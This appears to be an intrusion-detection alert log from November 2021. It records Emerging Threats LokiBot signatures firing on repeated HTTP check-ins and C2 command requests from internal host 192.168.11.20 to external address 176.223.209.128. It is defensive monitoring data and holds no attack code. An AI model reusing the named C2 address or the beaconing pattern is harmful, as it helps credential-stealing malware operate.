11/25/21-10:48:12.876249	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49853	80	192.168.11.20	176.223.209.128
11/25/21-10:48:12.876249	TCP	2025381	ET TROJAN LokiBot Checkin	49853	80	192.168.11.20	176.223.209.128
11/25/21-10:48:12.876249	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49853	80	192.168.11.20	176.223.209.128
11/25/21-10:48:13.646369	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49854	80	192.168.11.20	176.223.209.128
11/25/21-10:48:13.646369	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49854	80	192.168.11.20	176.223.209.128
11/25/21-10:48:13.646369	TCP	2025381	ET TROJAN LokiBot Checkin	49854	80	192.168.11.20	176.223.209.128
11/25/21-10:48:13.646369	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49854	80	192.168.11.20	176.223.209.128
11/25/21-10:48:14.406984	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49855	80	192.168.11.20	176.223.209.128
11/25/21-10:48:14.406984	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49855	80	192.168.11.20	176.223.209.128
11/25/21-10:48:14.406984	TCP	2025381	ET TROJAN LokiBot Checkin	49855	80	192.168.11.20	176.223.209.128
11/25/21-10:48:14.406984	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49855	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.068809	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49856	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.068809	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49856	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.068809	TCP	2025381	ET TROJAN LokiBot Checkin	49856	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.068809	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49856	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.740662	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49857	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.740662	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49857	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.740662	TCP	2025381	ET TROJAN LokiBot Checkin	49857	80	192.168.11.20	176.223.209.128
11/25/21-10:48:15.740662	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49857	80	192.168.11.20	176.223.209.128
11/25/21-10:48:16.437510	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49858	80	192.168.11.20	176.223.209.128
11/25/21-10:48:16.437510	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49858	80	192.168.11.20	176.223.209.128
11/25/21-10:48:16.437510	TCP	2025381	ET TROJAN LokiBot Checkin	49858	80	192.168.11.20	176.223.209.128
11/25/21-10:48:16.437510	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49858	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.100652	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49859	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.100652	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49859	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.100652	TCP	2025381	ET TROJAN LokiBot Checkin	49859	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.100652	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49859	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.734632	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49860	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.734632	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49860	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.734632	TCP	2025381	ET TROJAN LokiBot Checkin	49860	80	192.168.11.20	176.223.209.128
11/25/21-10:48:17.734632	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49860	80	192.168.11.20	176.223.209.128
11/25/21-10:48:18.417274	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49861	80	192.168.11.20	176.223.209.128
11/25/21-10:48:18.417274	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49861	80	192.168.11.20	176.223.209.128
11/25/21-10:48:18.417274	TCP	2025381	ET TROJAN LokiBot Checkin	49861	80	192.168.11.20	176.223.209.128
11/25/21-10:48:18.417274	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49861	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.071832	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49862	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.071832	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49862	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.071832	TCP	2025381	ET TROJAN LokiBot Checkin	49862	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.071832	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49862	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.719301	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49863	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.719301	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49863	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.719301	TCP	2025381	ET TROJAN LokiBot Checkin	49863	80	192.168.11.20	176.223.209.128
11/25/21-10:48:19.719301	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49863	80	192.168.11.20	176.223.209.128
11/25/21-10:48:20.354985	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49864	80	192.168.11.20	176.223.209.128
11/25/21-10:48:20.354985	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49864	80	192.168.11.20	176.223.209.128
11/25/21-10:48:20.354985	TCP	2025381	ET TROJAN LokiBot Checkin	49864	80	192.168.11.20	176.223.209.128
11/25/21-10:48:20.354985	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49864	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.038148	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49865	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.038148	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49865	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.038148	TCP	2025381	ET TROJAN LokiBot Checkin	49865	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.038148	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49865	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.765352	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49866	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.765352	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49866	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.765352	TCP	2025381	ET TROJAN LokiBot Checkin	49866	80	192.168.11.20	176.223.209.128
11/25/21-10:48:21.765352	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49866	80	192.168.11.20	176.223.209.128
11/25/21-10:48:22.464834	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49867	80	192.168.11.20	176.223.209.128
11/25/21-10:48:22.464834	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49867	80	192.168.11.20	176.223.209.128
11/25/21-10:48:22.464834	TCP	2025381	ET TROJAN LokiBot Checkin	49867	80	192.168.11.20	176.223.209.128
11/25/21-10:48:22.464834	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49867	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.130212	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49869	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.130212	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49869	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.130212	TCP	2025381	ET TROJAN LokiBot Checkin	49869	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.130212	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49869	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.726846	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49870	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.726846	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49870	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.726846	TCP	2025381	ET TROJAN LokiBot Checkin	49870	80	192.168.11.20	176.223.209.128
11/25/21-10:48:23.726846	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49870	80	192.168.11.20	176.223.209.128
11/25/21-10:48:24.413483	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49871	80	192.168.11.20	176.223.209.128
11/25/21-10:48:24.413483	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49871	80	192.168.11.20	176.223.209.128
11/25/21-10:48:24.413483	TCP	2025381	ET TROJAN LokiBot Checkin	49871	80	192.168.11.20	176.223.209.128
11/25/21-10:48:24.413483	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49871	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.080255	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49872	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.080255	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49872	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.080255	TCP	2025381	ET TROJAN LokiBot Checkin	49872	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.080255	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49872	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.780948	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49873	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.780948	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49873	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.780948	TCP	2025381	ET TROJAN LokiBot Checkin	49873	80	192.168.11.20	176.223.209.128
11/25/21-10:48:25.780948	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49873	80	192.168.11.20	176.223.209.128
11/25/21-10:48:26.412910	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49874	80	192.168.11.20	176.223.209.128
11/25/21-10:48:26.412910	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49874	80	192.168.11.20	176.223.209.128
11/25/21-10:48:26.412910	TCP	2025381	ET TROJAN LokiBot Checkin	49874	80	192.168.11.20	176.223.209.128
11/25/21-10:48:26.412910	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49874	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.083164	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49875	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.083164	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49875	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.083164	TCP	2025381	ET TROJAN LokiBot Checkin	49875	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.083164	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49875	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.693462	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49876	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.693462	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49876	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.693462	TCP	2025381	ET TROJAN LokiBot Checkin	49876	80	192.168.11.20	176.223.209.128
11/25/21-10:48:27.693462	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49876	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.273851	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49877	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.273851	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49877	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.273851	TCP	2025381	ET TROJAN LokiBot Checkin	49877	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.273851	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49877	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.858505	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49878	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.858505	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49878	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.858505	TCP	2025381	ET TROJAN LokiBot Checkin	49878	80	192.168.11.20	176.223.209.128
11/25/21-10:48:28.858505	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49878	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.436238	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49879	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.436238	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49879	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.436238	TCP	2025381	ET TROJAN LokiBot Checkin	49879	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.436238	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49879	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.956863	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49880	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.956863	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49880	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.956863	TCP	2025381	ET TROJAN LokiBot Checkin	49880	80	192.168.11.20	176.223.209.128
11/25/21-10:48:29.956863	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49880	80	192.168.11.20	176.223.209.128
11/25/21-10:48:30.618581	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49881	80	192.168.11.20	176.223.209.128
11/25/21-10:48:30.618581	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49881	80	192.168.11.20	176.223.209.128
11/25/21-10:48:30.618581	TCP	2025381	ET TROJAN LokiBot Checkin	49881	80	192.168.11.20	176.223.209.128
11/25/21-10:48:30.618581	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49881	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.231230	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49882	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.231230	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49882	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.231230	TCP	2025381	ET TROJAN LokiBot Checkin	49882	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.231230	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49882	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.831960	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49883	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.831960	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49883	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.831960	TCP	2025381	ET TROJAN LokiBot Checkin	49883	80	192.168.11.20	176.223.209.128
11/25/21-10:48:31.831960	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49883	80	192.168.11.20	176.223.209.128
11/25/21-10:48:32.435657	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49884	80	192.168.11.20	176.223.209.128
11/25/21-10:48:32.435657	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49884	80	192.168.11.20	176.223.209.128
11/25/21-10:48:32.435657	TCP	2025381	ET TROJAN LokiBot Checkin	49884	80	192.168.11.20	176.223.209.128
11/25/21-10:48:32.435657	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49884	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.088495	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49885	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.088495	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49885	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.088495	TCP	2025381	ET TROJAN LokiBot Checkin	49885	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.088495	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49885	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.745000	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49886	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.745000	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49886	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.745000	TCP	2025381	ET TROJAN LokiBot Checkin	49886	80	192.168.11.20	176.223.209.128
11/25/21-10:48:33.745000	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49886	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.343229	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49887	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.343229	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49887	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.343229	TCP	2025381	ET TROJAN LokiBot Checkin	49887	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.343229	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49887	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.941843	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49888	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.941843	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49888	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.941843	TCP	2025381	ET TROJAN LokiBot Checkin	49888	80	192.168.11.20	176.223.209.128
11/25/21-10:48:34.941843	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49888	80	192.168.11.20	176.223.209.128
11/25/21-10:48:35.542265	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49889	80	192.168.11.20	176.223.209.128
11/25/21-10:48:35.542265	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49889	80	192.168.11.20	176.223.209.128
11/25/21-10:48:35.542265	TCP	2025381	ET TROJAN LokiBot Checkin	49889	80	192.168.11.20	176.223.209.128
11/25/21-10:48:35.542265	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49889	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.204634	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49890	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.204634	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49890	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.204634	TCP	2025381	ET TROJAN LokiBot Checkin	49890	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.204634	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49890	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.820808	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49891	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.820808	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49891	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.820808	TCP	2025381	ET TROJAN LokiBot Checkin	49891	80	192.168.11.20	176.223.209.128
11/25/21-10:48:36.820808	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49891	80	192.168.11.20	176.223.209.128
11/25/21-10:48:37.469781	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49892	80	192.168.11.20	176.223.209.128
11/25/21-10:48:37.469781	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49892	80	192.168.11.20	176.223.209.128
11/25/21-10:48:37.469781	TCP	2025381	ET TROJAN LokiBot Checkin	49892	80	192.168.11.20	176.223.209.128
11/25/21-10:48:37.469781	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49892	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.005113	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49893	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.005113	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49893	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.005113	TCP	2025381	ET TROJAN LokiBot Checkin	49893	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.005113	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49893	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.572495	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49894	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.572495	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49894	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.572495	TCP	2025381	ET TROJAN LokiBot Checkin	49894	80	192.168.11.20	176.223.209.128
11/25/21-10:48:38.572495	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49894	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.175559	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49895	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.175559	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49895	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.175559	TCP	2025381	ET TROJAN LokiBot Checkin	49895	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.175559	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49895	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.761326	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49896	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.761326	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49896	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.761326	TCP	2025381	ET TROJAN LokiBot Checkin	49896	80	192.168.11.20	176.223.209.128
11/25/21-10:48:39.761326	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49896	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.218861	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49897	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.218861	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49897	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.218861	TCP	2025381	ET TROJAN LokiBot Checkin	49897	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.218861	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49897	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.780536	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49898	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.780536	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49898	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.780536	TCP	2025381	ET TROJAN LokiBot Checkin	49898	80	192.168.11.20	176.223.209.128
11/25/21-10:48:40.780536	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49898	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.373512	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49899	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.373512	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49899	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.373512	TCP	2025381	ET TROJAN LokiBot Checkin	49899	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.373512	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49899	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.968153	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49900	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.968153	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49900	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.968153	TCP	2025381	ET TROJAN LokiBot Checkin	49900	80	192.168.11.20	176.223.209.128
11/25/21-10:48:41.968153	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49900	80	192.168.11.20	176.223.209.128
11/25/21-10:48:42.536148	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49901	80	192.168.11.20	176.223.209.128
11/25/21-10:48:42.536148	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49901	80	192.168.11.20	176.223.209.128
11/25/21-10:48:42.536148	TCP	2025381	ET TROJAN LokiBot Checkin	49901	80	192.168.11.20	176.223.209.128
11/25/21-10:48:42.536148	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49901	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.112376	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49902	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.112376	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49902	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.112376	TCP	2025381	ET TROJAN LokiBot Checkin	49902	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.112376	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49902	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.645826	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49903	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.645826	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49903	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.645826	TCP	2025381	ET TROJAN LokiBot Checkin	49903	80	192.168.11.20	176.223.209.128
11/25/21-10:48:43.645826	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49903	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.201691	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49904	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.201691	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49904	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.201691	TCP	2025381	ET TROJAN LokiBot Checkin	49904	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.201691	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49904	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.811529	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49905	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.811529	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49905	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.811529	TCP	2025381	ET TROJAN LokiBot Checkin	49905	80	192.168.11.20	176.223.209.128
11/25/21-10:48:44.811529	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49905	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.392079	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49906	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.392079	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49906	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.392079	TCP	2025381	ET TROJAN LokiBot Checkin	49906	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.392079	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49906	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.989299	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49907	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.989299	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49907	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.989299	TCP	2025381	ET TROJAN LokiBot Checkin	49907	80	192.168.11.20	176.223.209.128
11/25/21-10:48:45.989299	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49907	80	192.168.11.20	176.223.209.128
11/25/21-10:48:46.527621	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49908	80	192.168.11.20	176.223.209.128
11/25/21-10:48:46.527621	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49908	80	192.168.11.20	176.223.209.128
11/25/21-10:48:46.527621	TCP	2025381	ET TROJAN LokiBot Checkin	49908	80	192.168.11.20	176.223.209.128
